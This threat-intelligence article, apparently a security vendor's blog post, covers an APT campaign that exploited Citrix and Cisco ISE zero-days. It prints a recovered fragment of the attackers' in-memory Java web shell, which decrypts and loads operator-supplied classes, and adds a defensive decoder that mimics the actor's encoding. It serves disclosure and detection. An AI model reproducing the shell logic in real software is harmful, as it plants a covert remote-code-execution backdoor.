Amazon’s threat intelligence division has disclosed a cyber-espionage campaign in which an advanced persistent threat (APT) group exploited previously undisclosed zero-day vulnerabilities in Cisco and Citrix products. The investigation showed that the attackers specifically targeted identity and network access control infrastructure, the components enterprises rely on to manage authentication and enforce security policy across their networks.
The initial discovery came from Amazon’s MadPot honeypot service, which detected exploitation attempts against the Citrix “Bleed Two” vulnerability, now tracked as CVE-2025-5777, before the flaw had been publicly disclosed. This early detection confirmed that the APT had been exploiting it as a zero-day.
Further analysis linked the same threat actor to another zero-day vulnerability, this one in Cisco Identity Services Engine (ISE). Amazon shared details of a suspicious payload with Cisco, which led to the identification of a flaw in the deserialization logic of an undocumented Cisco ISE endpoint.
The vulnerability, now designated CVE-2025-20337, allowed pre-authentication remote code execution, granting attackers administrator-level access to affected systems. What raised additional alarm was that this exploitation occurred before Cisco had assigned a CVE number or released patches.
Deployment of a Custom Web Shell
Following the successful compromise of targeted systems, the threat actor deployed a custom-built web shell disguised as a legitimate Cisco ISE component called IdentityAuditAction. Unlike typical off-the-shelf malware, this backdoor was tailored specifically for Cisco ISE environments.
Amazon’s investigation revealed that the web shell operated entirely in memory, leaving minimal traces for forensic analysis. It used Java reflection to inject itself into running threads, registered as an HTTP listener on the Tomcat server so that it could intercept every HTTP request, and encrypted its communication with DES, wrapping the ciphertext in a non-standard Base64 encoding. Reaching the shell required knowledge of specific HTTP headers, which further obscured its presence.
The following snippet from the web shell’s request-handling routine shows how it unwraps an operator’s request: it reverses the non-standard Base64 alphabet, DES-decrypts the result with a hard-coded key, and either defines the decrypted bytes as a new Java class or instantiates the already-loaded class and hands it the request through overridden equals() calls before triggering it with toString():
import java.io.ByteArrayOutputStream;
import java.util.Base64;
import javax.crypto.Cipher;
import javax.crypto.spec.SecretKeySpec;

// Fragment as recovered from the IdentityAuditAction web shell; `matcher`,
// `requestBody`, `decodeCipher`, `proxyClass`, `request` and `defineClass`
// are fields and helpers of the enclosing class that the fragment omits.
if (matcher.find()) {
    // Undo the actor's Base64 alphabet: '*' stands in for 'a' and '$' for 'l',
    // so a standard Base64 decoder will accept the body afterwards.
    requestBody = matcher.group(1).replace("*", "a").replace("$", "l");
    // DES in ECB mode with PKCS#5 padding and a hard-coded 8-byte key.
    // The literals 1 and 2 are Cipher.ENCRYPT_MODE and Cipher.DECRYPT_MODE.
    Cipher encodeCipher = Cipher.getInstance("DES/ECB/PKCS5Padding");
    decodeCipher = Cipher.getInstance("DES/ECB/PKCS5Padding");
    byte[] key = "d384922c".getBytes();
    encodeCipher.init(1, new SecretKeySpec(key, "DES"));
    decodeCipher.init(2, new SecretKeySpec(key, "DES"));
    // Base64-decode, then DES-decrypt, the operator's payload.
    byte[] data = Base64.getDecoder().decode(requestBody);
    data = decodeCipher.doFinal(data);
    ByteArrayOutputStream arrOut = new ByteArrayOutputStream();
    if (proxyClass == null) {
        // First contact: the decrypted bytes are a class file, loaded straight
        // from memory so nothing touches disk.
        proxyClass = this.defineClass(data);
    } else {
        // Later requests: instantiate the loaded class and pass it the output
        // buffer, the HTTP request and the payload through overridden equals()
        // calls, then run it by calling toString().
        Object f = proxyClass.newInstance();
        f.equals(arrOut);
        f.equals(request);
        f.equals(data);
        f.toString();
    }
}
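A defender who captures traffic to a suspected instance of this shell wants to reverse the same encoding the snippet above reverses, and to check whether a request body is in fact a DES-encrypted class file. The stand-alone Java program below is an added example written for this article, not code from Amazon’s report or from the web shell; it reuses only the transformation, key and character substitution visible in the recovered snippet. The class name, method names and the sample payload are assumptions for illustration, and the sample is constructed inline (a fake class-file header encrypted the way the actor’s client would have to) so the program runs offline without any real captured traffic.

```java
import java.nio.charset.StandardCharsets;
import java.util.Base64;
import java.util.regex.Pattern;
import javax.crypto.Cipher;
import javax.crypto.spec.SecretKeySpec;

// Hypothetical decoder/detector for request bodies that follow the shell's
// encoding: DES/ECB/PKCS5Padding under the hard-coded key, standard Base64,
// then 'a' and 'l' swapped for '*' and '$'.
public class IdentityAuditDecoder {

    // Key and transformation exactly as they appear in the recovered snippet.
    private static final byte[] KEY = "d384922c".getBytes(StandardCharsets.US_ASCII);
    private static final String TRANSFORM = "DES/ECB/PKCS5Padding";
    // Standard Base64 alphabet; '*' and '$' never occur in legitimate Base64.
    private static final Pattern BASE64 = Pattern.compile("^[A-Za-z0-9+/]+={0,2}$");

    // Reverse the actor's alphabet substitution so a normal decoder accepts it.
    static String undoSubstitution(String body) {
        return body.replace("*", "a").replace("$", "l");
    }

    // Cheap hunting signal: the body carries the substituted characters and is
    // otherwise Base64-shaped. Short ciphertexts may contain no 'a' or 'l', so
    // this alone is a pre-filter, not a verdict.
    static boolean hasActorAlphabet(String body) {
        boolean substituted = body.indexOf('*') >= 0 || body.indexOf('$') >= 0;
        return substituted && BASE64.matcher(undoSubstitution(body)).matches();
    }

    // Structural check: after normalisation the body is valid Base64 and decodes
    // to a non-zero whole number of 8-byte DES blocks.
    static boolean isDesSizedBase64(String body) {
        String normalised = undoSubstitution(body);
        if (!BASE64.matcher(normalised).matches()) return false;
        try {
            byte[] raw = Base64.getDecoder().decode(normalised);
            return raw.length > 0 && raw.length % 8 == 0;
        } catch (IllegalArgumentException e) {
            return false;
        }
    }

    // Recover the plaintext the shell would hand to defineClass().
    static byte[] decrypt(String body) throws Exception {
        Cipher cipher = Cipher.getInstance(TRANSFORM);
        cipher.init(Cipher.DECRYPT_MODE, new SecretKeySpec(KEY, "DES"));
        return cipher.doFinal(Base64.getDecoder().decode(undoSubstitution(body)));
    }

    // Strong signal: the decrypted bytes begin with the class-file magic 0xCAFEBABE.
    // Unrelated traffic either fails PKCS#5 unpadding or decrypts to garbage.
    static boolean decryptsToJavaClass(String body) {
        try {
            byte[] data = decrypt(body);
            return data.length >= 4
                && (data[0] & 0xFF) == 0xCA && (data[1] & 0xFF) == 0xFE
                && (data[2] & 0xFF) == 0xBA && (data[3] & 0xFF) == 0xBE;
        } catch (Exception e) {
            return false;
        }
    }

    // Test helper only: build a body the way the actor's client would have to,
    // so the decoder can be exercised without real captured traffic.
    static String encodeLikeActor(byte[] plaintext) throws Exception {
        Cipher cipher = Cipher.getInstance(TRANSFORM);
        cipher.init(Cipher.ENCRYPT_MODE, new SecretKeySpec(KEY, "DES"));
        String b64 = Base64.getEncoder().encodeToString(cipher.doFinal(plaintext));
        return b64.replace("a", "*").replace("l", "$");
    }

    public static void main(String[] args) throws Exception {
        // Constructed sample: a fake class-file header (magic + version), not a real payload.
        byte[] fakeClass = {(byte) 0xCA, (byte) 0xFE, (byte) 0xBA, (byte) 0xBE, 0, 0, 0, 0x34};
        String captured = encodeLikeActor(fakeClass);
        System.out.println("body:                 " + captured);
        System.out.println("actor alphabet:       " + hasActorAlphabet(captured));
        System.out.println("DES-sized Base64:     " + isDesSizedBase64(captured));
        System.out.println("decrypts to class:    " + decryptsToJavaClass(captured));

        // A benign Base64 body: no substituted characters, wrong block size, no class magic.
        String benign = Base64.getEncoder().encodeToString("hello".getBytes(StandardCharsets.US_ASCII));
        System.out.println("benign actor alphabet: " + hasActorAlphabet(benign));
        System.out.println("benign decrypts:       " + decryptsToJavaClass(benign));
    }
}
```

Run it with `javac IdentityAuditDecoder.java && java IdentityAuditDecoder`. The two cheap checks are useful for triage over a large capture, but only `decryptsToJavaClass` is conclusive: a legitimate Base64 body that happens to contain no ‘a’ or ‘l’ passes through the substitution unchanged, so its absence proves nothing, while a successful PKCS#5 unpadding under the hard-coded key followed by the 0xCAFEBABE magic is not something benign traffic produces by accident. Note that the same hard-coded key is what makes this decoder possible at all; an operator who rotated keys per victim would have left defenders with only the structural checks.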
Defensive Measures for CVE-2025-20337 and CVE-2025-5777
The simultaneous exploitation of CVE-2025-20337 and CVE-2025-5777 illustrates the growing tendency of APTs to treat identity and access control infrastructure as a high-value target. According to Amazon, the attacks were indiscriminate and aimed at internet-facing systems, meaning any exposed, unpatched instance was at risk for the duration of the campaign.
Exploiting systems in the window before vendors have issued fixes, described here as “patch-gap” exploitation, highlights a persistent challenge in enterprise cybersecurity. Such tactics are typically the work of well-funded threat groups with advanced vulnerability research capabilities or access to undisclosed vulnerability data.
Amazon emphasized that even well-maintained systems can fall victim to pre-authentication zero-days, underscoring the need for defense-in-depth. Security teams are advised to:
- Restrict access to privileged security appliance endpoints like Cisco ISE and Citrix management portals through network segmentation and firewalls.
- Closely monitor for anomalous activity on these appliances, such as HTTP listeners or handlers registered on the Tomcat server that are not part of the vendor’s build, unexpected classes loaded into the application’s Java process, or request bodies that are opaque encrypted blobs rather than the traffic the endpoint normally carries.
- Stay current with vendor advisories and threat intelligence feeds regarding emerging zero-day vulnerabilities.
- Minimize public internet exposure of critical identity and network control systems, routing access through VPNs or isolated management interfaces.
Conclusion
Amazon’s findings reveal how today’s threat actors are targeting identity and access systems as key entry points. By exploiting CVE-2025-5777 in Citrix and CVE-2025-20337 in Cisco ISE, attackers demonstrated both precision and intent.
Cyble helps enterprises stay ahead of such threats with its advanced Vulnerability Management platform. By monitoring emerging zero-days, prioritizing patches by risk, and offering deep insights into active exploits, Cyble empowers security teams to act before attackers do.
Schedule a demo to discover how its AI-driven intelligence can strengthen your defense against modern cyber threats.
